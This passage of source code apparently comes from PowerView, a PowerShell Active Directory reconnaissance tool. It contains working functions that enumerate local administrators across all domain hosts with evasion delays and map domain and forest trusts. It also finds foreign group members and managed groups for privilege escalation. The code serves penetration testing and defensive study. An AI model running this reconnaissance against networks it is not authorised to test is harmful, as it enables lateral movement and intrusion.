data table $Null = $TableVulnComputers.Rows.Add($AdsHostname,$AdsOS,$AdsSP,$AdsLast,$ExploitMsf,$ExploitCVE) } } } # Display results $VulnComputer = $TableVulnComputers | Select-Object ComputerName -Unique | Measure-Object $VulnComputerCount = $VulnComputer.Count if ($VulnComputer.Count -gt 0) { # Return vulnerable server list order with some hack date casting Write-Verbose "[+] Found $VulnComputerCount potentially vulnerable systems!" $TableVulnComputers | Sort-Object { $_.lastlogon -as [datetime]} -Descending } else { Write-Verbose "[-] No vulnerable systems were found." } } function Invoke-EnumerateLocalAdmin { <# .SYNOPSIS This function queries the domain for all active machines with Get-NetComputer, then for each server it queries the local Administrators with Get-NetLocalGroup. Author: @harmj0y License: BSD 3-Clause .PARAMETER ComputerName Host array to enumerate, passable on the pipeline. .PARAMETER ComputerFile File of hostnames/IPs to search. .PARAMETER ComputerFilter Host filter name to query AD for, wildcards accepted. .PARAMETER ComputerADSpath The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER NoPing Switch. Don't ping each host to ensure it's up before enumerating. .PARAMETER Delay Delay between enumerating hosts, defaults to 0 .PARAMETER Jitter Jitter for the host delay, defaults to +/- 0.3 .PARAMETER OutFile Output results to a specified csv output file. .PARAMETER NoClobber Switch. Don't overwrite any existing output file. .PARAMETER TrustGroups Switch. Only return results that are not part of the local machine or the machine's domain. Old Invoke-EnumerateLocalTrustGroup functionality. .PARAMETER DomainOnly Switch. Only return domain (non-local) results .PARAMETER Domain Domain to query for machines, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER SearchForest Switch. Search all domains in the forest for target users instead of just a single domain. .PARAMETER API Switch. Use API calls instead of the WinNT service provider. Less information, but the results are faster. .PARAMETER Threads The maximum concurrent threads to execute. .EXAMPLE PS C:\> Invoke-EnumerateLocalAdmin Enumerates the members of local administrators for all machines in the current domain. .EXAMPLE PS C:\> Invoke-EnumerateLocalAdmin -Threads 10 Threaded local admin enumeration, replaces Invoke-EnumerateLocalAdminThreaded .LINK http://blog.harmj0y.net/ #> [CmdletBinding()] param( [Parameter(Position=0,ValueFromPipeline=$True)] [Alias('Hosts')] [String[]] $ComputerName, [ValidateScript({Test-Path -Path $_ })] [Alias('HostList')] [String] $ComputerFile, [String] $ComputerFilter, [String] $ComputerADSpath, [Switch] $NoPing, [UInt32] $Delay = 0, [Double] $Jitter = .3, [String] $OutFile, [Switch] $NoClobber, [Switch] $TrustGroups, [Switch] $DomainOnly, [String] $Domain, [String] $DomainController, [Switch] $SearchForest, [ValidateRange(1,100)] [Int] $Threads, [Switch] $API ) begin { if ($PSBoundParameters['Debug']) { $DebugPreference = 'Continue' } # random object for delay $RandNo = New-Object System.Random Write-Verbose "[*] Running Invoke-EnumerateLocalAdmin with delay of $Delay" # if we're using a host list, read the targets in and add them to the target list if($ComputerFile) { $ComputerName = Get-Content -Path $ComputerFile } if(!$ComputerName) { [array]$ComputerName = @() if($Domain) { $TargetDomains = @($Domain) } elseif($SearchForest) { # get ALL the domains in the forest to search $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name } } else { # use the local domain $TargetDomains = @( (Get-NetDomain).name ) } ForEach ($Domain in $TargetDomains) { Write-Verbose "[*] Querying domain $Domain for hosts" $ComputerName += Get-NetComputer -Filter $ComputerFilter -ADSpath $ComputerADSpath -Domain $Domain -DomainController $DomainController } # remove any null target hosts, uniquify the list and shuffle it $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random } if($($ComputerName.Count) -eq 0) { throw "No hosts found!" } } # delete any existing output file if it already exists if(!$NoClobber) { if ($OutFile -and (Test-Path -Path $OutFile)) { Remove-Item -Path $OutFile } } if($TrustGroups) { Write-Verbose "Determining domain trust groups" # find all group names that have one or more users in another domain $TrustGroupNames = Find-ForeignGroup -Domain $Domain -DomainController $DomainController | ForEach-Object { $_.GroupName } | Sort-Object -Unique $TrustGroupsSIDs = $TrustGroupNames | ForEach-Object { # ignore the builtin administrators group for a DC (S-1-5-32-544) # TODO: ignore all default built in sids? Get-NetGroup -Domain $Domain -DomainController $DomainController -GroupName $_ -FullData | Where-Object { $_.objectsid -notmatch "S-1-5-32-544" } | ForEach-Object { $_.objectsid } } # query for the primary domain controller so we can extract the domain SID for filtering $DomainSID = Get-DomainSID -Domain $Domain -DomainController $DomainController } # script block that enumerates a server $HostEnumBlock = { param($ComputerName, $Ping, $OutFile, $DomainSID, $TrustGroupsSIDs, $API, $DomainOnly) # optionally check if the server is up first $Up = $True if($Ping) { $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName } if($Up) { # grab the users for the local admins on this server if($API) { $LocalAdmins = Get-NetLocalGroup -ComputerName $ComputerName -API } else { $LocalAdmins = Get-NetLocalGroup -ComputerName $ComputerName } # if we just want to return cross-trust users if($DomainSID) { # get the local machine SID $LocalSID = ($LocalAdmins | Where-Object { $_.SID -match '.*-500$' }).SID -replace "-500$" Write-Verbose "LocalSid for $ComputerName : $LocalSID" # filter out accounts that begin with the machine SID and domain SID # but preserve any groups that have users across a trust ($TrustGroupSIDS) $LocalAdmins = $LocalAdmins | Where-Object { ($TrustGroupsSIDs -contains $_.SID) -or ((-not $_.SID.startsWith($LocalSID)) -and (-not $_.SID.startsWith($DomainSID))) } } if($DomainOnly) { $LocalAdmins = $LocalAdmins | Where-Object {$_.IsDomain} } if($LocalAdmins -and ($LocalAdmins.Length -ne 0)) { # output the results to a csv if specified if($OutFile) { $LocalAdmins | Export-PowerViewCSV -OutFile $OutFile } else { # otherwise return the user objects $LocalAdmins } } else { Write-Verbose "[!] No users returned from $ComputerName" } } } } process { if($Threads) { Write-Verbose "Using threading with threads = $Threads" # if we're using threading, kick off the script block with Invoke-ThreadedFunction $ScriptParams = @{ 'Ping' = $(-not $NoPing) 'OutFile' = $OutFile 'DomainSID' = $DomainSID 'TrustGroupsSIDs' = $TrustGroupsSIDs } # kick off the threaded script block + arguments if($API) { $ScriptParams['API'] = $True } if($DomainOnly) { $ScriptParams['DomainOnly'] = $True } Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads } else { if(-not $NoPing -and ($ComputerName.count -ne 1)) { # ping all hosts in parallel $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}} $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100 } Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)" $Counter = 0 ForEach ($Computer in $ComputerName) { $Counter = $Counter + 1 # sleep for our semi-randomized interval Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))" $ScriptArgs = @($Computer, $False, $OutFile, $DomainSID, $TrustGroupsSIDs, $API, $DomainOnly) Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $ScriptArgs } } } } ######################################################## # # Domain trust functions below. # ######################################################## function Get-NetDomainTrust { <# .SYNOPSIS Return all domain trusts for the current domain or a specified domain. .PARAMETER Domain The domain whose trusts to enumerate, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER ADSpath The LDAP source to search through, e.g. "LDAP://DC=testlab,DC=local". Useful for global catalog queries ;) .PARAMETER API Use an API call (DsEnumerateDomainTrusts) to enumerate the trusts. .PARAMETER LDAP Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections. More likely to get around network segmentation, but not as accurate. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .EXAMPLE PS C:\> Get-NetDomainTrust Return domain trusts for the current domain using built in .NET methods. .EXAMPLE PS C:\> Get-NetDomainTrust -Domain "prod.testlab.local" Return domain trusts for the "prod.testlab.local" domain using .NET methods .EXAMPLE PS C:\> Get-NetDomainTrust -LDAP -Domain "prod.testlab.local" -DomainController "PRIMARY.testlab.local" Return domain trusts for the "prod.testlab.local" domain enumerated through LDAP queries, reflecting queries through the "Primary.testlab.local" domain controller, using .NET methods. .EXAMPLE PS C:\> Get-NetDomainTrust -API -Domain "prod.testlab.local" Return domain trusts for the "prod.testlab.local" domain enumerated through API calls. .EXAMPLE PS C:\> Get-NetDomainTrust -API -DomainController WINDOWS2.testlab.local Return domain trusts reachable from the WINDOWS2 machine through API calls. #> [CmdletBinding()] param( [Parameter(Position=0, ValueFromPipeline=$True)] [String] $Domain, [String] $DomainController, [String] $ADSpath, [Switch] $API, [Switch] $LDAP, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) begin { $TrustAttributes = @{ [uint32]'0x00000001' = 'non_transitive' [uint32]'0x00000002' = 'uplevel_only' [uint32]'0x00000004' = 'quarantined_domain' [uint32]'0x00000008' = 'forest_transitive' [uint32]'0x00000010' = 'cross_organization' [uint32]'0x00000020' = 'within_forest' [uint32]'0x00000040' = 'treat_as_external' [uint32]'0x00000080' = 'trust_uses_rc4_encryption' [uint32]'0x00000100' = 'trust_uses_aes_keys' [uint32]'0x00000200' = 'cross_organization_no_tgt_delegation' [uint32]'0x00000400' = 'pim_trust' } } process { if(-not $Domain) { # if not domain is specified grab the current domain $SourceDomain = (Get-NetDomain -Credential $Credential).Name } else { $SourceDomain = $Domain } if($LDAP -or $ADSPath) { $TrustSearcher = Get-DomainSearcher -Domain $SourceDomain -DomainController $DomainController -Credential $Credential -PageSize $PageSize -ADSpath $ADSpath $SourceSID = Get-DomainSID -Domain $SourceDomain -DomainController $DomainController if($TrustSearcher) { $TrustSearcher.Filter = '(objectClass=trustedDomain)' $Results = $TrustSearcher.FindAll() $Results | Where-Object {$_} | ForEach-Object { $Props = $_.Properties $DomainTrust = New-Object PSObject $TrustAttrib = @() $TrustAttrib += $TrustAttributes.Keys | Where-Object { $Props.trustattributes[0] -band $_ } | ForEach-Object { $TrustAttributes[$_] } $Direction = Switch ($Props.trustdirection) { 0 { 'Disabled' } 1 { 'Inbound' } 2 { 'Outbound' } 3 { 'Bidirectional' } } $ObjectGuid = New-Object Guid @(,$Props.objectguid[0]) $TargetSID = (New-Object System.Security.Principal.SecurityIdentifier($Props.securityidentifier[0],0)).Value $DomainTrust | Add-Member Noteproperty 'SourceName' $SourceDomain $DomainTrust | Add-Member Noteproperty 'SourceSID' $SourceSID $DomainTrust | Add-Member Noteproperty 'TargetName' $Props.name[0] $DomainTrust | Add-Member Noteproperty 'TargetSID' $TargetSID $DomainTrust | Add-Member Noteproperty 'ObjectGuid' "{$ObjectGuid}" $DomainTrust | Add-Member Noteproperty 'TrustType' $($TrustAttrib -join ',') $DomainTrust | Add-Member Noteproperty 'TrustDirection' "$Direction" $DomainTrust.PSObject.TypeNames.Add('PowerView.DomainTrustLDAP') $DomainTrust } $Results.dispose() $TrustSearcher.dispose() } } elseif($API) { if(-not $DomainController) { $DomainController = Get-NetDomainController -Credential $Credential -Domain $SourceDomain | Select-Object -First 1 | Select-Object -ExpandProperty Name } if($DomainController) { # arguments for DsEnumerateDomainTrusts $PtrInfo = [IntPtr]::Zero # 63 = DS_DOMAIN_IN_FOREST + DS_DOMAIN_DIRECT_OUTBOUND + DS_DOMAIN_TREE_ROOT + DS_DOMAIN_PRIMARY + DS_DOMAIN_NATIVE_MODE + DS_DOMAIN_DIRECT_INBOUND $Flags = 63 $DomainCount = 0 # get the trust information from the target server $Result = $Netapi32::DsEnumerateDomainTrusts($DomainController, $Flags, [ref]$PtrInfo, [ref]$DomainCount) # Locate the offset of the initial intPtr $Offset = $PtrInfo.ToInt64() # 0 = success if (($Result -eq 0) -and ($Offset -gt 0)) { # Work out how much to increment the pointer by finding out the size of the structure $Increment = $DS_DOMAIN_TRUSTS::GetSize() # parse all the result structures for ($i = 0; ($i -lt $DomainCount); $i++) { # create a new int ptr at the given offset and cast the pointer as our result structure $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset $Info = $NewIntPtr -as $DS_DOMAIN_TRUSTS $Offset = $NewIntPtr.ToInt64() $Offset += $Increment $SidString = "" $Result = $Advapi32::ConvertSidToStringSid($Info.DomainSid, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() if($Result -eq 0) { Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)" } else { $DomainTrust = New-Object PSObject $DomainTrust | Add-Member Noteproperty 'SourceDomain' $SourceDomain $DomainTrust | Add-Member Noteproperty 'SourceDomainController' $DomainController $DomainTrust | Add-Member Noteproperty 'NetbiosDomainName' $Info.NetbiosDomainName $DomainTrust | Add-Member Noteproperty 'DnsDomainName' $Info.DnsDomainName $DomainTrust | Add-Member Noteproperty 'Flags' $Info.Flags $DomainTrust | Add-Member Noteproperty 'ParentIndex' $Info.ParentIndex $DomainTrust | Add-Member Noteproperty 'TrustType' $Info.TrustType $DomainTrust | Add-Member Noteproperty 'TrustAttributes' $Info.TrustAttributes $DomainTrust | Add-Member Noteproperty 'DomainSid' $SidString $DomainTrust | Add-Member Noteproperty 'DomainGuid' $Info.DomainGuid $DomainTrust.PSObject.TypeNames.Add('PowerView.APIDomainTrust') $DomainTrust } } # free up the result buffer $Null = $Netapi32::NetApiBufferFree($PtrInfo) } else { Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)" } } else { Write-Verbose "Could not retrieve domain controller for $Domain" } } else { # if we're using direct domain connections through .NET $FoundDomain = Get-NetDomain -Domain $Domain -Credential $Credential if($FoundDomain) { $FoundDomain.GetAllTrustRelationships() | ForEach-Object { $_.PSObject.TypeNames.Add('PowerView.DomainTrust') $_ } } } } } function Get-NetForestTrust { <# .SYNOPSIS Return all trusts for the current forest. .PARAMETER Forest Return trusts for the specified forest. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Get-NetForestTrust Return current forest trusts. .EXAMPLE PS C:\> Get-NetForestTrust -Forest "test" Return trusts for the "test" forest. #> [CmdletBinding()] param( [Parameter(Position=0,ValueFromPipeline=$True)] [String] $Forest, [Management.Automation.PSCredential] $Credential ) process { $FoundForest = Get-NetForest -Forest $Forest -Credential $Credential if($FoundForest) { $FoundForest.GetAllTrustRelationships() | ForEach-Object { $_.PSObject.TypeNames.Add('PowerView.ForestTrust') $_ } } } } function Find-ForeignUser { <# .SYNOPSIS Enumerates users who are in groups outside of their principal domain. The -Recurse option will try to map all transitive domain trust relationships and enumerate all users who are in groups outside of their principal domain. .PARAMETER UserName Username to filter results for, wildcards accepted. .PARAMETER Domain Domain to query for users, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER LDAP Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections. More likely to get around network segmentation, but not as accurate. .PARAMETER Recurse Switch. Enumerate all user trust groups from all reachable domains recursively. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .LINK http://blog.harmj0y.net/ #> [CmdletBinding()] param( [String] $UserName, [String] $Domain, [String] $DomainController, [Switch] $LDAP, [Switch] $Recurse, [ValidateRange(1,10000)] [Int] $PageSize = 200 ) function Get-ForeignUser { # helper used to enumerate users who are in groups outside of their principal domain param( [String] $UserName, [String] $Domain, [String] $DomainController, [ValidateRange(1,10000)] [Int] $PageSize = 200 ) if ($Domain) { # get the domain name into distinguished form $DistinguishedDomainName = "DC=" + $Domain -replace '\.',',DC=' } else { $DistinguishedDomainName = [String] ([adsi]'').distinguishedname $Domain = $DistinguishedDomainName -replace 'DC=','' -replace ',','.' } Get-NetUser -Domain $Domain -DomainController $DomainController -UserName $UserName -PageSize $PageSize -Filter '(memberof=*)' | ForEach-Object { ForEach ($Membership in $_.memberof) { $Index = $Membership.IndexOf("DC=") if($Index) { $GroupDomain = $($Membership.substring($Index)) -replace 'DC=','' -replace ',','.' if ($GroupDomain.CompareTo($Domain)) { # if the group domain doesn't match the user domain, output $GroupName = $Membership.split(",")[0].split("=")[1] $ForeignUser = New-Object PSObject $ForeignUser | Add-Member Noteproperty 'UserDomain' $Domain $ForeignUser | Add-Member Noteproperty 'UserName' $_.samaccountname $ForeignUser | Add-Member Noteproperty 'GroupDomain' $GroupDomain $ForeignUser | Add-Member Noteproperty 'GroupName' $GroupName $ForeignUser | Add-Member Noteproperty 'GroupDN' $Membership $ForeignUser } } } } } if ($Recurse) { # get all rechable domains in the trust mesh and uniquify them if($LDAP -or $DomainController) { $DomainTrusts = Invoke-MapDomainTrust -LDAP -DomainController $DomainController -PageSize $PageSize | ForEach-Object { $_.SourceDomain } | Sort-Object -Unique } else { $DomainTrusts = Invoke-MapDomainTrust -PageSize $PageSize | ForEach-Object { $_.SourceDomain } | Sort-Object -Unique } ForEach($DomainTrust in $DomainTrusts) { # get the trust groups for each domain in the trust mesh Write-Verbose "Enumerating trust groups in domain $DomainTrust" Get-ForeignUser -Domain $DomainTrust -UserName $UserName -PageSize $PageSize } } else { Get-ForeignUser -Domain $Domain -DomainController $DomainController -UserName $UserName -PageSize $PageSize } } function Find-ForeignGroup { <# .SYNOPSIS Enumerates all the members of a given domain's groups and finds users that are not in the queried domain. The -Recurse flag will perform this enumeration for all eachable domain trusts. .PARAMETER GroupName Groupname to filter results for, wildcards accepted. .PARAMETER Domain Domain to query for groups, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER LDAP Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections. More likely to get around network segmentation, but not as accurate. .PARAMETER Recurse Switch. Enumerate all group trust users from all reachable domains recursively. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .LINK http://blog.harmj0y.net/ #> [CmdletBinding()] param( [String] $GroupName = '*', [String] $Domain, [String] $DomainController, [Switch] $LDAP, [Switch] $Recurse, [ValidateRange(1,10000)] [Int] $PageSize = 200 ) function Get-ForeignGroup { param( [String] $GroupName = '*', [String] $Domain, [String] $DomainController, [ValidateRange(1,10000)] [Int] $PageSize = 200 ) if(-not $Domain) { $Domain = (Get-NetDomain).Name } $DomainDN = "DC=$($Domain.Replace('.', ',DC='))" Write-Verbose "DomainDN: $DomainDN" # standard group names to ignore $ExcludeGroups = @("Users", "Domain Users", "Guests") # get all the groupnames for the given domain Get-NetGroup -GroupName $GroupName -Filter '(member=*)' -Domain $Domain -DomainController $DomainController -FullData -PageSize $PageSize | Where-Object { # exclude common large groups -not ($ExcludeGroups -contains $_.samaccountname) } | ForEach-Object { $GroupName = $_.samAccountName $_.member | ForEach-Object { # filter for foreign SIDs in the cn field for users in another domain, # or if the DN doesn't end with the proper DN for the queried domain if (($_ -match 'CN=S-1-5-21.*-.*') -or ($DomainDN -ne ($_.substring($_.IndexOf("DC="))))) { $UserDomain = $_.subString($_.IndexOf("DC=")) -replace 'DC=','' -replace ',','.' $UserName = $_.split(",")[0].split("=")[1] $ForeignGroupUser = New-Object PSObject $ForeignGroupUser | Add-Member Noteproperty 'GroupDomain' $Domain $ForeignGroupUser | Add-Member Noteproperty 'GroupName' $GroupName $ForeignGroupUser | Add-Member Noteproperty 'UserDomain' $UserDomain $ForeignGroupUser | Add-Member Noteproperty 'UserName' $UserName $ForeignGroupUser | Add-Member Noteproperty 'UserDN' $_ $ForeignGroupUser } } } } if ($Recurse) { # get all rechable domains in the trust mesh and uniquify them if($LDAP -or $DomainController) { $DomainTrusts = Invoke-MapDomainTrust -LDAP -DomainController $DomainController -PageSize $PageSize | ForEach-Object { $_.SourceDomain } | Sort-Object -Unique } else { $DomainTrusts = Invoke-MapDomainTrust -PageSize $PageSize | ForEach-Object { $_.SourceDomain } | Sort-Object -Unique } ForEach($DomainTrust in $DomainTrusts) { # get the trust groups for each domain in the trust mesh Write-Verbose "Enumerating trust groups in domain $DomainTrust" Get-ForeignGroup -GroupName $GroupName -Domain $Domain -DomainController $DomainController -PageSize $PageSize } } else { Get-ForeignGroup -GroupName $GroupName -Domain $Domain -DomainController $DomainController -PageSize $PageSize } } function Find-ManagedSecurityGroups { <# .SYNOPSIS This function retrieves all security groups in the domain and identifies ones that have a manager set. It also determines whether the manager has the ability to add or remove members from the group. Author: Stuart Morgan (@ukstufus) License: BSD 3-Clause .EXAMPLE PS C:\> Find-ManagedSecurityGroups | Export-PowerViewCSV -NoTypeInformation group-managers.csv Store a list of all security groups with managers in group-managers.csv .DESCRIPTION Authority to manipulate the group membership of AD security groups and distribution groups can be delegated to non-administrators by setting the 'managedBy' attribute. This is typically used to delegate management authority to distribution groups, but Windows supports security groups being managed in the same way. This function searches for AD groups which have a group manager set, and determines whether that user can manipulate group membership. This could be a useful method of horizontal privilege escalation, especially if the manager can manipulate the membership of a privileged group. .LINK https://github.com/PowerShellEmpire/Empire/pull/119 #> # Go through the list of security groups on the domain and identify those who have a manager Get-NetGroup -FullData -Filter '(managedBy=*)' | Select-Object -Unique distinguishedName,managedBy,cn | ForEach-Object { # Retrieve the object that the managedBy DN refers to $group_manager = Get-ADObject -ADSPath $_.managedBy | Select-Object cn,distinguishedname,name,samaccounttype,samaccountname # Create a results object to store our findings $results_object = New-Object -TypeName PSObject -Property @{ 'GroupCN' = $_.cn 'GroupDN' = $_.distinguishedname 'ManagerCN' = $group_manager.cn 'ManagerDN' = $group_manager.distinguishedName 'ManagerSAN' = $group_manager.samaccountname 'ManagerType' = '' 'CanManagerWrite' = $FALSE } # Determine whether the manager is a user or a group if ($group_manager.samaccounttype -eq 0x10000000) { $results_object.ManagerType = 'Group' } elseif ($group_manager.samaccounttype -eq 0x30000000) { $results_object.ManagerType = 'User' } # Find the ACLs that relate to the ability to write to the group $xacl = Get-ObjectAcl -ADSPath $_.distinguishedname -Rights WriteMembers # Double-check that the manager if ($xacl.ObjectType -eq 'bf9679c0-0de6-11d0-a285-00aa003049e2' -and $xacl.AccessControlType -eq 'Allow' -and $xacl.IdentityReference.Value.Contains($group_manager.samaccountname)) { $results_object.CanManagerWrite = $TRUE } $results_object } } function Invoke-MapDomainTrust { <# .SYNOPSIS This function gets all trusts for the current domain, and tries to get all trusts for each domain it finds. .PARAMETER LDAP Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections. More likely to get around network segmentation, but not as accurate. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Invoke-MapDomainTrust | Export-CSV -NoTypeInformation trusts.csv Map all reachable domain trusts and output everything to a .csv file. .LINK http://blog.harmj0y.net/ #> [CmdletBinding()] param( [Switch] $LDAP, [String] $DomainController, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) # keep track of domains seen so we don't hit infinite recursion $SeenDomains = @{} # our domain status tracker $Domains = New-Object System.Collections.Stack # get the current domain and push it onto the stack $CurrentDomain = (Get-NetDomain -Credential $Credential).Name $Domains.push($CurrentDomain) while($Domains.Count -ne 0) { $Domain = $Domains.Pop() # if we haven't seen this domain before if ($Domain -and ($Domain.Trim() -ne "") -and (-not $SeenDomains.ContainsKey($Domain))) { Write-Verbose "Enumerating trusts for domain '$Domain'" # mark it as seen in our list $Null = $SeenDomains.add($Domain, "") try { # get all the trusts for this domain if($LDAP -or $DomainController) { $Trusts = Get-NetDomainTrust -Domain $Domain -LDAP -DomainController $DomainController -PageSize $PageSize -Credential $Credential } else { $Trusts = Get-NetDomainTrust -Domain $Domain -PageSize $PageSize -Credential $Credential } if($Trusts -isnot [System.Array]) { $Trusts = @($Trusts) } # get any forest trusts, if they exist if(-not ($LDAP -or $DomainController) ) { $Trusts += Get-NetForestTrust -Forest $Domain -Credential $Credential } if ($Trusts) { if($Trusts -isnot [System.Array]) { $Trusts = @($Trusts) } # enumerate each trust found ForEach ($Trust in $Trusts) { if($Trust.SourceName -and $Trust.TargetName) { $SourceDomain = $Trust.SourceName $TargetDomain = $Trust.TargetName $TrustType = $Trust.TrustType $TrustDirection = $Trust.TrustDirection $ObjectType = $Trust.PSObject.TypeNames | Where-Object {$_ -match 'PowerView'} | Select-Object -First 1 # make sure we process the target $Null = $Domains.Push($TargetDomain) # build the nicely-parsable custom output object $DomainTrust = New-Object PSObject $DomainTrust | Add-Member Noteproperty 'SourceDomain' "$SourceDomain" $DomainTrust | Add-Member Noteproperty 'SourceSID' $Trust.SourceSID $DomainTrust | Add-Member Noteproperty 'TargetDomain' "$TargetDomain" $DomainTrust | Add-Member Noteproperty 'TargetSID' $Trust.TargetSID $DomainTrust | Add-Member Noteproperty 'TrustType' "$TrustType" $DomainTrust | Add-Member Noteproperty 'TrustDirection' "$TrustDirection" $DomainTrust.PSObject.TypeNames.Add($ObjectType) $DomainTrust } } } } catch { Write-Verbose "[!] Error: $_" } } } } ######################################################## # # Expose the Win32API functions and datastructures below # using PSReflect. # Warning: Once these are executed, they are baked in # and can't be changed while the script is running! # ######################################################## $Mod = New-InMemoryModule -ModuleName Win32 # all of the Win32 API functions we need $FunctionDefinitions = @( (func netapi32 NetShareEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), (func netapi32 NetWkstaUserEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), (func netapi32 NetSessionEnum ([Int]) @([String], [String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), (func netapi32 NetLocalGroupGetMembers ([Int]) @([String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), (func netapi32 DsGetSiteName ([Int]) @([String], [IntPtr].MakeByRefType())), (func netapi32 DsEnumerateDomainTrusts ([Int]) @([String], [UInt32], [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType())), (func netapi32 NetApiBufferFree ([Int]) @([IntPtr])), (func advapi32 ConvertSidToStringSid ([Int]) @([IntPtr], [String].MakeByRefType()) -SetLastError), (func advapi32 OpenSCManagerW ([IntPtr]) @([String], [String], [Int]) -SetLastError), (func advapi32 CloseServiceHandle ([Int]) @([IntPtr])), (func wtsapi32 WTSOpenServerEx ([IntPtr]) @([String])), (func wtsapi32 WTSEnumerateSessionsEx ([Int]) @([IntPtr], [Int32].MakeByRefType(), [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError), (func wtsapi32 WTSQuerySessionInformation ([Int]) @([IntPtr], [Int], [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError), (func wtsapi32 WTSFreeMemoryEx ([Int]) @([Int32], [IntPtr], [Int32])), (func wtsapi32 WTSFreeMemory ([Int]) @([IntPtr])), (func wtsapi32 WTSCloseServer ([Int]) @([IntPtr])) ) # enum used by $WTS_SESSION_INFO_1 below $WTSConnectState = psenum $Mod WTS_CONNECTSTATE_CLASS UInt16 @{ Active = 0 Connected = 1 ConnectQuery = 2 Shadow = 3 Disconnected = 4 Idle = 5 Listen = 6 Reset = 7 Down = 8 Init = 9 } # the WTSEnumerateSessionsEx result structure $WTS_SESSION_INFO_1 = struct $Mod WTS_SESSION_INFO_1 @{ ExecEnvId = field 0 UInt32 State = field 1 $WTSConnectState SessionId = field 2 UInt32 pSessionName = field 3 String -MarshalAs @('LPWStr') pHostName = field 4 String -MarshalAs @('LPWStr') pUserName = field 5 String -MarshalAs @('LPWStr') pDomainName = field 6 String -MarshalAs @('LPWStr') pFarmName = field 7 String -MarshalAs @('LPWStr') } # the particular WTSQuerySessionInformation result structure $WTS_CLIENT_ADDRESS = struct $mod WTS_CLIENT_ADDRESS @{ AddressFamily = field 0 UInt32 Address = field 1 Byte[] -MarshalAs @('ByValArray', 20) } # the NetShareEnum result structure $SHARE_INFO_1 = struct $Mod SHARE_INFO_1 @{ shi1_netname = field 0 String -MarshalAs @('LPWStr') shi1_type = field 1 UInt32 shi1_remark = field 2 String -MarshalAs @('LPWStr') } # the NetWkstaUserEnum result structure $WKSTA_USER_INFO_1 = struct $Mod WKSTA_USER_INFO_1 @{ wkui1_username = field 0 String -MarshalAs @('LPWStr') wkui1_logon_domain = field 1 String -MarshalAs @('LPWStr') wkui1_oth_domains = field 2 String -MarshalAs @('LPWStr') wkui1_logon_server = field 3 String -MarshalAs @('LPWStr') } # the NetSessionEnum result structure $SESSION_INFO_10 = struct $Mod SESSION_INFO_10 @{ sesi10_cname = field 0 String -MarshalAs @('LPWStr') sesi10_username = field 1 String -MarshalAs @('LPWStr') sesi10_time = field 2 UInt32 sesi10_idle_time = field 3 UInt32 } # enum used by $LOCALGROUP_MEMBERS_INFO_2 below $SID_NAME_USE = psenum $Mod SID_NAME_USE UInt16 @{ SidTypeUser = 1 SidTypeGroup = 2 SidTypeDomain = 3 SidTypeAlias = 4 SidTypeWellKnownGroup = 5 SidTypeDeletedAccount = 6 SidTypeInvalid = 7 SidTypeUnknown = 8 SidTypeComputer = 9 } # the NetLocalGroupGetMembers result structure $LOCALGROUP_MEMBERS_INFO_2 = struct $Mod LOCALGROUP_MEMBERS_INFO_2 @{ lgrmi2_sid = field 0 IntPtr lgrmi2_sidusage = field 1 $SID_NAME_USE lgrmi2_domainandname = field 2 String -MarshalAs @('LPWStr') } # enums used in DS_DOMAIN_TRUSTS $DsDomainFlag = psenum $Mod DsDomain.Flags UInt32 @{ IN_FOREST = 1 DIRECT_OUTBOUND = 2 TREE_ROOT = 4 PRIMARY = 8 NATIVE_MODE = 16 DIRECT_INBOUND = 32 } -Bitfield $DsDomainTrustType = psenum 